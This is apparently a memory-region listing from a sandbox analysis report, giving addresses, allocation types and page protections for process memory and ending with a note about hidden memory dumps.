28C88650000
direct allocation
page read and write
17341164000
heap
page read and write
1618214F000
trusted library allocation
page read and write
2BAD97F0000
heap
page read and write
26CD2760000
heap
page read and write
1BD201F1000
heap
page read and write
1BF4F6A0000
heap
page read and write
1CCD86D1000
heap
page read and write
1BD20160000
heap
page read and write
28C876DF000
heap
page read and write
28C87CD7000
heap
page read and write
28C88B51000
heap
page read and write
18EBB0EF000
heap
page read and write
161802E0000
trusted library allocation
page read and write
1E19FFC0000
heap
page read and write
26CD27CB000
heap
page read and write
1E1A0657000
heap
page read and write
28C87D01000
heap
page read and write
1E1A0058000
heap
page read and write
28C877CE000
heap
page read and write
18EBB800000
heap
page read and write
7FF8B8F9C000
unkown
page read and write
7FF73AE52000
unkown
page readonly
28E2CE17000
heap
page read and write
28C87308000
heap
page read and write
173412A6000
heap
page read and write
1E1A01B0000
heap
page read and write
1CCD86C4000
heap
page read and write
941127F000
stack
page read and write
28C87D9B000
heap
page read and write
14B35A77000
heap
page read and write
1436DC7B000
heap
page read and write
28C88B51000
heap
page read and write
28C88620000
direct allocation
page read and write
18EBB105000
heap
page read and write
28C88B6F000
heap
page read and write
28C88B6F000
heap
page read and write
28FE1241000
heap
page read and write
1E1A1EE6000
heap
page read and write
28C8763D000
heap
page read and write
1436DA07000
heap
page read and write
28C87789000
heap
page read and write
28C88794000
heap
page read and write
17342260000
heap
page read and write
21AD4637000
heap
page read and write
26CD27E1000
heap
page read and write
7FF8A8592000
unkown
page execute and read and write
28C88710000
heap
page read and write
1E1A0032000
heap
page read and write
28C88A09000
heap
page read and write
B5137FF000
stack
page read and write
28C87DBE000
heap
page read and write
28C87358000
heap
page read and write
28FE1241000
heap
page read and write
25CAEB20000
heap
page read and write
28C88B31000
heap
page read and write
7FF8478E0000
trusted library allocation
page read and write
28C87C3C000
heap
page read and write
28C87DDF000
heap
page read and write
1618330A000
trusted library allocation
page read and write
1BD201F1000
heap
page read and write
28C87C74000
heap
page read and write
7FF8B984A000
unkown
page execute and write copy
1E19FFE8000
heap
page read and write
28C873DD000
heap
page read and write
808214C000
stack
page read and write
1F23A680000
heap
page read and write
40857F000
stack
page read and write
28C87520000
direct allocation
page read and write
1F23A75A000
heap
page read and write
27258B11000
heap
page read and write
7FF847890000
trusted library allocation
page execute and read and write
28C87C79000
heap
page read and write
28E2CE2F000
heap
page read and write
1CCD86C4000
heap
page read and write
28C88640000
direct allocation
page read and write
25CAEC40000
heap
page read and write
28C88B85000
heap
page read and write
28E2CE45000
heap
page read and write
22AE12A0000
heap
page read and write
22AE13BD000
heap
page read and write
1CCD86D1000
heap
page read and write
28C87D8E000
heap
page read and write
B4AF97F000
stack
page read and write
28E2CFBE000
heap
page read and write
28C88F40000
direct allocation
page read and write
28C87BFE000
heap
page read and write
28C873A4000
heap
page read and write
28FE15B0000
heap
page read and write
14B35AA9000
heap
page read and write
28C87CD4000
heap
page read and write
266C3E50000
heap
page read and write
28C87376000
heap
page read and write
28FE15B5000
heap
page read and write
1CCD86C4000
heap
page read and write
28C87C6F000
heap
page read and write
7FF8A81AA000
unkown
page read and write
1CCD86D1000
heap
page read and write
28C87800000
heap
page read and write
1CCD86D1000
heap
page read and write
7FF847A10000
trusted library allocation
page read and write
18A64BC0000
heap
page read and write
28C88754000
heap
page read and write
1E1A0058000
heap
page read and write
7FF8476FC000
trusted library allocation
page execute and read and write
54EBB9C000
stack
page read and write
1436F9C4000
heap
page read and write
1436E11C000
heap
page read and write
7FF8A8860000
unkown
page readonly
1436DA0C000
heap
page read and write
28C88B69000
heap
page read and write
28C87BFE000
heap
page read and write
18EBB807000
heap
page read and write
28C88620000
direct allocation
page read and write
28C87D59000
heap
page read and write
28C87CD4000
heap
page read and write
18EBB110000
heap
page read and write
1F23A743000
heap
page read and write
2BAD97FB000
heap
page read and write
1C7FBA40000
heap
page read and write
28CC31B0000
heap
page read and write
1618359A000
trusted library allocation
page read and write
7FF73AE4E000
unkown
page write copy
7FF8A8861000
unkown
page execute and read and write
20D5DEBE000
heap
page read and write
2545B38A000
heap
page read and write
28C88F20000
direct allocation
page read and write
4B4C3BF000
stack
page read and write
14B35410000
trusted library allocation
page read and write
17341080000
heap
page read and write
7FF8A86E0000
unkown
page readonly
7FF8BFAB9000
unkown
page execute and read and write
28E2CDF2000
heap
page read and write
28C88680000
direct allocation
page read and write
28C87333000
heap
page read and write
28C877BD000
heap
page read and write
1D6085D0000
heap
page read and write
15371690000
heap
page read and write
28C88A73000
heap
page read and write
1CCD86C4000
heap
page read and write
1BC8A8AC000
heap
page read and write
28C87CD4000
heap
page read and write
14B35506000
heap
page read and write
14B35A87000
heap
page read and write
1530008C000
trusted library allocation
page read and write
28C87CF8000
heap
page read and write
28C88B34000
heap
page read and write
28C87CB0000
heap
page read and write
7FF8479E2000
trusted library allocation
page read and write
28C87D9A000
heap
page read and write
17340970000
heap
page read and write
18EBB80F000
heap
page read and write
32C73CF000
stack
page read and write
173422E4000
heap
page read and write
1F23A880000
direct allocation
page read and write
1F23A766000
heap
page read and write
28C87631000
heap
page read and write
E4DFA7F000
stack
page read and write
1CCD86C3000
heap
page read and write
28C88620000
direct allocation
page read and write
1429BA50000
heap
page read and write
7FF8B8CF3000
unkown
page read and write
28C88842000
heap
page read and write
15310010000
trusted library allocation
page read and write
28C88FB0000
direct allocation
page read and write
14B35A8C000
heap
page read and write
28C87C29000
heap
page read and write
7FF8478A0000
trusted library allocation
page read and write
1CCD86C4000
heap
page read and write
18EBB824000
heap
page read and write
1734229A000
heap
page read and write
26CD27D9000
heap
page read and write
28E2CE33000
heap
page read and write
89022FF000
stack
page read and write
1BF4F5A0000
heap
page read and write
18EBB2A0000
trusted library allocation
page read and write
28C88A2D000
heap
page read and write
28C88794000
heap
page read and write
7FF8B9088000
unkown
page execute and read and write
20D5DE7F000
heap
page read and write
1B839BD0000
heap
page read and write
14B35A74000
heap
page read and write
18EBB0E3000
heap
page read and write
257A3070000
heap
page read and write
28C877BD000
heap
page read and write
288163F000
stack
page read and write
28C881C8000
direct allocation
page read and write
28C87E2A000
heap
page read and write
2720DA90000
heap
page read and write
193223A0000
heap
page read and write
1733EF64000
heap
page read and write
28FE1241000
heap
page read and write
18EBB280000
heap
page read and write
7FF8476C0000
trusted library allocation
page read and write
28E2CE3D000
heap
page read and write
16191F6E000
trusted library allocation
page read and write
28C87DA2000
heap
page read and write
1436E10E000
heap
page read and write
1436E107000
heap
page read and write
7FF8B8CD1000
unkown
page execute and read and write
28C88B55000
heap
page read and write
2238CFA0000
heap
page read and write
257A315A000
heap
page read and write
28C87CA2000
heap
page read and write
1CCD86C4000
heap
page read and write
28E2CE37000
heap
page read and write
1AC9F6B4000
heap
page read and write
1CCD86D1000
heap
page read and write
28C88B7D000
heap
page read and write
18EBB6AA000
heap
page read and write
6A08AFF000
stack
page read and write
18A64C21000
heap
page read and write
F134E8000
stack
page read and write
28C873A4000
heap
page read and write
4B4BB5F000
stack
page read and write
1F23A74B000
heap
page read and write
1436D9FE000
heap
page read and write
1932238B000
heap
page read and write
15371720000
trusted library allocation
page read and write
246E4F90000
heap
page read and write
1F23A7C9000
heap
page read and write
28C8774D000
heap
page read and write
28C87DAA000
heap
page read and write
1E1A0033000
heap
page read and write
1CCD86C4000
heap
page read and write
28C87DCA000
heap
page read and write
1619A443000
heap
page read and write
161802C0000
trusted library allocation
page read and write
153101B8000
trusted library allocation
page read and write
1619A490000
heap
page read and write
28C87D9A000
heap
page read and write
28E2CE4C000
heap
page read and write
28C87CB0000
heap
page read and write
18EBB6A4000
heap
page read and write
1436DA25000
heap
page read and write
20D5E075000
heap
page read and write
1BD20050000
heap
page read and write
1E1A1EE0000
heap
page read and write
14B37320000
heap
page read and write
28C88B69000
heap
page read and write
28C87DAA000
heap
page read and write
14B35AA9000
heap
page read and write
1CCD86D1000
heap
page read and write
28C88B5F000
heap
page read and write
28C87190000
heap
page read and write
28C8873B000
heap
page read and write
28C88640000
direct allocation
page read and write
17341164000
heap
page read and write
7FF847890000
trusted library allocation
page read and write
173422B2000
heap
page read and write
1618318C000
trusted library allocation
page read and write
1429BA50000
heap
page read and write
9410F5B000
stack
page read and write
7FF847AA0000
trusted library allocation
page read and write
28C87BFE000
heap
page read and write
1E1A0048000
heap
page read and write
28C8874B000
heap
page read and write
28C88763000
heap
page read and write
7FF8476A2000
trusted library allocation
page read and write
18EBB0CA000
heap
page read and write
DFF4DFF000
stack
page read and write
28B63515000
heap
page read and write
1E1A005F000
heap
page read and write
F137FD000
stack
page read and write
182DF99B000
heap
page read and write
16183A84000
trusted library allocation
page read and write
16191CA1000
trusted library allocation
page read and write
1436D9E1000
heap
page read and write
1E1A0660000
heap
page read and write
28C88B69000
heap
page read and write
1619A531000
heap
page read and write
234DAD90000
heap
page read and write
27258AFA000
heap
page read and write
28C87C76000
heap
page read and write
28C87D10000
heap
page read and write
17341D7E000
heap
page read and write
28C87CA8000
heap
page read and write
7FF8B9849000
unkown
page execute and read and write
1436D9CA000
heap
page read and write
28E2CE23000
heap
page read and write
7FF8476B0000
trusted library allocation
page read and write
17342270000
heap
page read and write
1436E12C000
heap
page read and write
1F23DC10000
direct allocation
page read and write
2BAD9808000
heap
page read and write
28E2CFB2000
heap
page read and write
7FF8A8851000
unkown
page execute and write copy
7FF8478F0000
trusted library allocation
page read and write
173422DC000
heap
page read and write
1BF4F6D0000
heap
page read and write
28C88AEE000
heap
page read and write
28C87358000
heap
page read and write
1F23A772000
heap
page read and write
28C88D9E000
heap
page read and write
1E1A0037000
heap
page read and write
1B839C2D000
heap
page read and write
1429BA50000
heap
page read and write
1CCD86D1000
heap
page read and write
1436D9ED000
heap
page read and write
1429BA30000
heap
page read and write
1733EFBF000
heap
page read and write
28C87C29000
heap
page read and write
199D3950000
heap
page read and write
28B63130000
heap
page read and write
1CCD86D1000
heap
page read and write
8FA3F6C000
stack
page read and write
28C87D91000
heap
page read and write
28C87BFE000
heap
page read and write
4B4C07E000
stack
page read and write
E8CB9FF000
stack
page read and write
28C87D97000
heap
page read and write
1E1A0018000
heap
page read and write
28C87CE0000
heap
page read and write
1436DA07000
heap
page read and write
28E2CECC000
heap
page read and write
28C8876F000
heap
page read and write
1E19FFC7000
heap
page read and write
97B0FF000
stack
page read and write
16183AA4000
trusted library allocation
page read and write
4B4C2B8000
stack
page read and write
28C8878F000
heap
page read and write
1CCD86D1000
heap
page read and write
199D3997000
heap
page read and write
28C87DAA000
heap
page read and write
2238D070000
heap
page read and write
2D0F7FF000
unkown
page read and write
28C88758000
heap
page read and write
7FF8B9F78000
unkown
page read and write
28C8782D000
heap
page read and write
173422B2000
heap
page read and write
1CCD86D1000
heap
page read and write
1733EF4E000
heap
page read and write
1C7FBC55000
heap
page read and write
14B37334000
heap
page read and write
28E2CE20000
heap
page read and write
1E1A0660000
heap
page read and write
1436D9F0000
heap
page read and write
28C881CB000
heap
page read and write
1733F0A0000
heap
page readonly
1436D9A7000
heap
page read and write
7FF8BFAB1000
unkown
page execute and read and write
28C876DA000
heap
page read and write
7FF8BA253000
unkown
page readonly
51AD67B000
stack
page read and write
173422E5000
heap
page read and write
28C88F60000
direct allocation
page read and write
1A6A14D9000
heap
page read and write
28C8774A000
heap
page read and write
28C858E9000
heap
page read and write
1E1A1EF4000
heap
page read and write
28E2CEA4000
heap
page read and write
28C87322000
heap
page read and write
14B35A7A000
heap
page read and write
28C87300000
heap
page read and write
1E1A0044000
heap
page read and write
19322350000
heap
page read and write
15373074000
heap
page read and write
2238D360000
heap
page read and write
28C88760000
heap
page read and write
7FF73AE50000
unkown
page read and write
28C87D9D000
heap
page read and write
28C877C9000
heap
page read and write
26CD2AB0000
heap
page read and write
15301CBC000
trusted library allocation
page read and write
28E2D4A3000
heap
page read and write
28C87D9A000
heap
page read and write
16191F6A000
trusted library allocation
page read and write
18D01A70000
heap
page read and write
2BAD9AA0000
heap
page read and write
28E2CE7E000
heap
page read and write
7FF73AE10000
unkown
page readonly
28C88A42000
heap
page read and write
28C89900000
direct allocation
page read and write
1E1A0040000
heap
page read and write
1E19FFF7000
heap
page read and write
28C87DCA000
heap
page read and write
28C87C68000
heap
page read and write
28C87C73000
heap
page read and write
28C87D2B000
heap
page read and write
1F23A7C1000
heap
page read and write
28C87D94000
heap
page read and write
28C88B60000
heap
page read and write
1A96E473000
heap
page read and write
241A8540000
heap
page read and write
1733EF50000
heap
page read and write
1AC9F660000
heap
page read and write
1A96E46A000
heap
page read and write
941137F000
stack
page read and write
28C8878F000
heap
page read and write
153102F0000
trusted library allocation
page read and write
28E2CEB3000
heap
page read and write
DFF4CFF000
stack
page read and write
28C88B3F000
heap
page read and write
288117A000
stack
page read and write
28B6331E000
heap
page read and write
28E2ED24000
heap
page read and write
28C877CE000
heap
page read and write
28C87800000
heap
page read and write
28C87800000
heap
page read and write
1F23A75E000
heap
page read and write
1F23A763000
heap
page read and write
257A3151000
heap
page read and write
1436DA29000
heap
page read and write
9410FDF000
stack
page read and write
16182E5C000
trusted library allocation
page read and write
B513A7F000
stack
page read and write
21AD4641000
heap
page read and write
1BC8A8A1000
heap
page read and write
25CAEDE0000
heap
page read and write
1619A330000
trusted library allocation
page read and write
16182B94000
trusted library allocation
page read and write
1436E115000
heap
page read and write
28C87CB0000
heap
page read and write
1BC8A850000
heap
page read and write
28C88B2F000
heap
page read and write
1C7FBA61000
heap
page read and write
1E19FFC2000
heap
page read and write
28E2ED1E000
heap
page read and write
266C3E80000
heap
page read and write
28C88B73000
heap
page read and write
28C87680000
heap
page read and write
18A64C21000
heap
page read and write
7FF847A30000
trusted library allocation
page read and write
1436F9B2000
heap
page read and write
7FF847870000
trusted library allocation
page execute and read and write
21AD462A000
heap
page read and write
21AD4641000
heap
page read and write
14B35A93000
heap
page read and write
17342DD9000
heap
page read and write
1F23A769000
heap
page read and write
1F23A7D0000
heap
page read and write
28C87310000
heap
page read and write
1F23DC66000
direct allocation
page read and write
28C87320000
heap
page read and write
28C87D94000
heap
page read and write
1E1A0044000
heap
page read and write
1F23A78A000
heap
page read and write
28C88906000
heap
page read and write
28C87308000
heap
page read and write
7FF8B8B11000
unkown
page execute and read and write
28C87CB5000
heap
page read and write
27258B11000
heap
page read and write
1619A48C000
heap
page read and write
28C88630000
direct allocation
page read and write
28C87800000
heap
page read and write
1619A210000
heap
page read and write
2882207000
stack
page read and write
22AE1370000
heap
page read and write
1F23A74E000
heap
page read and write
18EBB2D0000
heap
page read and write
1CCD86D2000
heap
page read and write
18A64BD0000
heap
page read and write
14B35A9E000
heap
page read and write
17341166000
heap
page read and write
28E2D47C000
heap
page read and write
1E19FFC5000
heap
page read and write
1F23A8C0000
direct allocation
page read and write
1436E118000
heap
page read and write
C0A61DB000
stack
page read and write
1F23A781000
heap
page read and write
1B839C2B000
heap
page read and write
28C8734B000
heap
page read and write
22AE13C4000
heap
page read and write
28C87D94000
heap
page read and write
28C8874D000
heap
page read and write
246E5290000
heap
page read and write
28E2CFB3000
heap
page read and write
28C8732E000
heap
page read and write
1C7FBA61000
heap
page read and write
18A64DD0000
heap
page read and write
18EBB7FC000
heap
page read and write
28B63318000
heap
page read and write
182DF965000
heap
page read and write
20D5DE93000
heap
page read and write
14B3551D000
heap
page read and write
28E2CD70000
trusted library allocation
page read and write
28E2CEB6000
heap
page read and write
1436DA19000
heap
page read and write
1F23A7C6000
heap
page read and write
1733EED0000
heap
page read and write
28C8767C000
heap
page read and write
28C8874F000
heap
page read and write
12FA27F000
stack
page read and write
7FF8B9060000
unkown
page readonly
28FE1241000
heap
page read and write
7FF8BFABC000
unkown
page execute and write copy
28E2CE5D000
heap
page read and write
18EBB099000
heap
page read and write
28C88A48000
heap
page read and write
F135FF000
stack
page read and write
1AC9F669000
heap
page read and write
28C87800000
heap
page read and write
28C88620000
direct allocation
page read and write
28C88234000
direct allocation
page read and write
1CCD86D0000
heap
page read and write
28C87D8F000
heap
page read and write
15373A70000
heap
page read and write
1BD201F1000
heap
page read and write
1BF4F6F1000
heap
page read and write
28E2CD70000
trusted library allocation
page read and write
1F23DD10000
direct allocation
page read and write
7FF847AC0000
trusted library allocation
page execute and read and write
28C873C5000
heap
page read and write
28C88906000
heap
page read and write
257A314E000
heap
page read and write
18EBB0F8000
heap
page read and write
28C88610000
direct allocation
page read and write
28815BE000
stack
page read and write
7FF7F7E80000
unkown
page readonly
28B63230000
heap
page read and write
7FF8B8B40000
unkown
page execute and write copy
14B35A70000
heap
page read and write
28C87CA2000
heap
page read and write
22AE13A9000
heap
page read and write
28FE1237000
heap
page read and write
18EBB0FD000
heap
page read and write
28C88B55000
heap
page read and write
28C872D0000
direct allocation
page read and write
28C87DCA000
heap
page read and write
D5386FF000
stack
page read and write
7FF84775C000
trusted library allocation
page execute and read and write
28C8772D000
heap
page read and write
28C87CFD000
heap
page read and write
28C87CBA000
heap
page read and write
21AD4720000
heap
page read and write
25CAEB61000
heap
page read and write
1F23A7C9000
heap
page read and write
1F23A7E7000
heap
page read and write
1F23DBD0000
direct allocation
page read and write
28C877D5000
heap
page read and write
28C88620000
direct allocation
page read and write
7FF8A813E000
unkown
page execute and read and write
28C87302000
heap
page read and write
28C88298000
direct allocation
page read and write
51AD77F000
stack
page read and write
1F23A764000
heap
page read and write
18EBB7FC000
heap
page read and write
28C87CA8000
heap
page read and write
28C87D6C000
heap
page read and write
DFF4D7F000
stack
page read and write
1D6085E0000
heap
page read and write
1F23DCA0000
direct allocation
page read and write
153715D3000
heap
page read and write
28C88620000
direct allocation
page read and write
1E19FF70000
trusted library allocation
page read and write
28C87D23000
heap
page read and write
1436D9EC000
heap
page read and write
16191CB1000
trusted library allocation
page read and write
28C87CC8000
heap
page read and write
68D9EFF000
unkown
page read and write
28C87C6D000
heap
page read and write
182DF997000
heap
page read and write
15301CB8000
trusted library allocation
page read and write
1436D9F5000
heap
page read and write
2331558B000
heap
page read and write
1F23C204000
heap
page read and write
28C87C70000
heap
page read and write
173422D0000
heap
page read and write
F00ACFE000
unkown
page read and write
7FF8BFAB0000
unkown
page readonly
173422B2000
heap
page read and write
7FF847970000
trusted library allocation
page read and write
1F23A768000
heap
page read and write
161831A1000
trusted library allocation
page read and write
28C877BA000
heap
page read and write
28FE1241000
heap
page read and write
28FE1220000
heap
page read and write
28C88B7F000
heap
page read and write
28C87B3D000
heap
page read and write
28C87CA8000
heap
page read and write
1436D9C8000
heap
page read and write
28C88B3F000
heap
page read and write
7FF8478C0000
trusted library allocation
page read and write
1A6A1450000
heap
page read and write
16181B49000
heap
page read and write
18EBB829000
heap
page read and write
1B839C27000
heap
page read and write
1E1A0640000
heap
page read and write
28C87C97000
heap
page read and write
28C87BFE000
heap
page read and write
28C87800000
heap
page read and write
28C87C97000
heap
page read and write
28811FE000
stack
page read and write
18EBB804000
heap
page read and write
7FF8B8CE9000
unkown
page execute and read and write
28C87CD7000
heap
page read and write
28C87D8C000
heap
page read and write
28C886C0000
direct allocation
page read and write
28C8873B000
heap
page read and write
1CCD86C4000
heap
page read and write
18EBD0AD000
heap
page read and write
28C88F60000
direct allocation
page read and write
28C872FC000
heap
page read and write
1E19FF70000
trusted library allocation
page read and write
18EBD0A2000
heap
page read and write
7FF8479FA000
trusted library allocation
page read and write
173409F5000
heap
page read and write
7FF73AE4E000
unkown
page write copy
1BC8A770000
heap
page read and write
17341C9D000
heap
page read and write
1436D9E3000
heap
page read and write
28C87C76000
heap
page read and write
28E2D484000
heap
page read and write
28C873DE000
heap
page read and write
DFF4C7B000
stack
page read and write
28C87CA8000
heap
page read and write
17342258000
heap
page read and write
18EBB0E3000
heap
page read and write
161834AF000
trusted library allocation
page read and write
7FF8BA259000
unkown
page readonly
28C88B5F000
heap
page read and write
28C87DA0000
heap
page read and write
4B4C4BB000
stack
page read and write
14B35528000
heap
page read and write
4D5CCFE000
stack
page read and write
7FF8A824E000
unkown
page execute and read and write
28C88F70000
direct allocation
page read and write
1EE628C0000
heap
page read and write
153715E3000
heap
page read and write
1618359C000
trusted library allocation
page read and write
7FF8479FC000
trusted library allocation
page read and write
15373686000
heap
page read and write
28E2CEB6000
heap
page read and write
28B63325000
heap
page read and write
28C88660000
direct allocation
page read and write
1436DA33000
heap
page read and write
7FF847940000
trusted library allocation
page read and write
28C87C77000
heap
page read and write
28C88862000
heap
page read and write
161802F0000
heap
page readonly
1436D9E1000
heap
page read and write
6A088FB000
stack
page read and write
F00ADFF000
stack
page read and write
1619A232000
heap
page read and write
21AD4740000
heap
page read and write
28C87682000
heap
page read and write
14B35A9E000
heap
page read and write
28C87BFE000
heap
page read and write
2720DB29000
heap
page read and write
28C87C90000
heap
page read and write
28C87CA2000
heap
page read and write
257A312B000
heap
page read and write
16183266000
trusted library allocation
page read and write
1EE13790000
heap
page read and write
28CC32E2000
heap
page read and write
7FF7F7F28000
unkown
page readonly
17342260000
heap
page read and write
2720DDE0000
heap
page read and write
1436F9B0000
heap
page read and write
1436D9FD000
heap
page read and write
17342270000
heap
page read and write
7FF847910000
trusted library allocation
page read and write
20D5DEF9000
heap
page read and write
28C88B63000
heap
page read and write
28C88B6D000
heap
page read and write
7FF8B8CB0000
unkown
page readonly
161801AF000
heap
page read and write
28C88794000
heap
page read and write
E8CB8FF000
stack
page read and write
28E2D4A0000
heap
page read and write
28C87C88000
heap
page read and write
7FF73AE50000
unkown
page read and write
1AC9F5C0000
heap
page read and write
28C8734E000
heap
page read and write
28C87CB0000
heap
page read and write
6768AFF000
stack
page read and write
28C88B7D000
heap
page read and write
28E2CEBD000
heap
page read and write
38EFD9C000
stack
page read and write
28C88640000
direct allocation
page read and write
28C880A0000
direct allocation
page read and write
4D5CA7B000
stack
page read and write
1EE13580000
heap
page read and write
1CCD86C4000
heap
page read and write
2238D170000
heap
page read and write
18EBB6A5000
heap
page read and write
21D4D820000
heap
page read and write
1E1A01B5000
heap
page read and write
1B839BC5000
heap
page read and write
1CCD86C4000
heap
page read and write
B2C24FF000
stack
page read and write
28C876B1000
heap
page read and write
4084FF000
stack
page read and write
1C7FBA61000
heap
page read and write
20C0AC3B000
heap
page read and write
28C88610000
direct allocation
page read and write
14B354D7000
heap
page read and write
28C87B55000
heap
page read and write
28CC32BA000
heap
page read and write
1733EFCE000
heap
page read and write
18EBB0E3000
heap
page read and write
173423C5000
heap
page read and write
18EBD0AD000
heap
page read and write
1D608347000
heap
page read and write
7FF73AE52000
unkown
page readonly
28C88F51000
heap
page read and write
28C88A6B000
heap
page read and write
1F23A799000
heap
page read and write
1BC8A8A1000
heap
page read and write
B0630FE000
unkown
page read and write
257A315A000
heap
page read and write
1436D9A2000
heap
page read and write
28C87308000
heap
page read and write
1F23A7DE000
heap
page read and write
7FF8476BB000
trusted library allocation
page execute and read and write
There are 3044 hidden memdumps, click here to show them.